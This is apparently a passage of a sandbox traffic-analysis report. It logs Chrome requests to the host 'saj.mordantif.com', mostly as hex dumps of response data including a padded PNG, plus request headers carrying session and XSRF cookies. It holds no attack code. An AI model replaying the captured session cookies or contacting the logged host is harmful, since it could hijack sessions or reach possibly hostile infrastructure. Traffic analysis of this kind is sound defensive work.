                                                        2024-09-13 13:07:12 UTC1369INData Raw: 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2 d6 80 6a 04 b8
                                                        Data Ascii: .[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#hj
                                                        2024-09-13 13:07:12 UTC1369INData Raw: b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3 82 97 ec 6c be
                                                        Data Ascii: 1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5Wl
                                                        2024-09-13 13:07:12 UTC1369INData Raw: d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9 93 38 76 40 92
                                                        Data Ascii: JS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v@
                                                        2024-09-13 13:07:12 UTC1369INData Raw: 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47 b6 e6
                                                        Data Ascii: ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G
                                                        2024-09-13 13:07:12 UTC1369INData Raw: 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61 b7 a2
                                                        Data Ascii: #zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGa
                                                        2024-09-13 13:07:12 UTC1369INData Raw: e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88 5e 9b
                                                        Data Ascii: jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m^
                                                        2024-09-13 13:07:12 UTC1369INData Raw: f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80 6f e4
                                                        Data Ascii: L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3o
                                                        2024-09-13 13:07:12 UTC1369INData Raw: dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68 8b b3
                                                        Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.549839104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:12 UTC1138OUTGET /uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:13 UTC666INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:13 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70712
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7AOce5TmVA4Pu3BXfEo1OqwSBZUIhqvjr4NHIHAp8IJocOcNKqqa98UYNu5uhbxuDWdrQpzuQQnaFH0t7OrjpIsNTOnC%2F0KVAUUQm%2BuFrwsmU1rrPD77Mg74qR8hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285be32f60c34a-EWR
                                                        2024-09-13 13:07:13 UTC703INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.549840104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:12 UTC1136OUTGET /ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
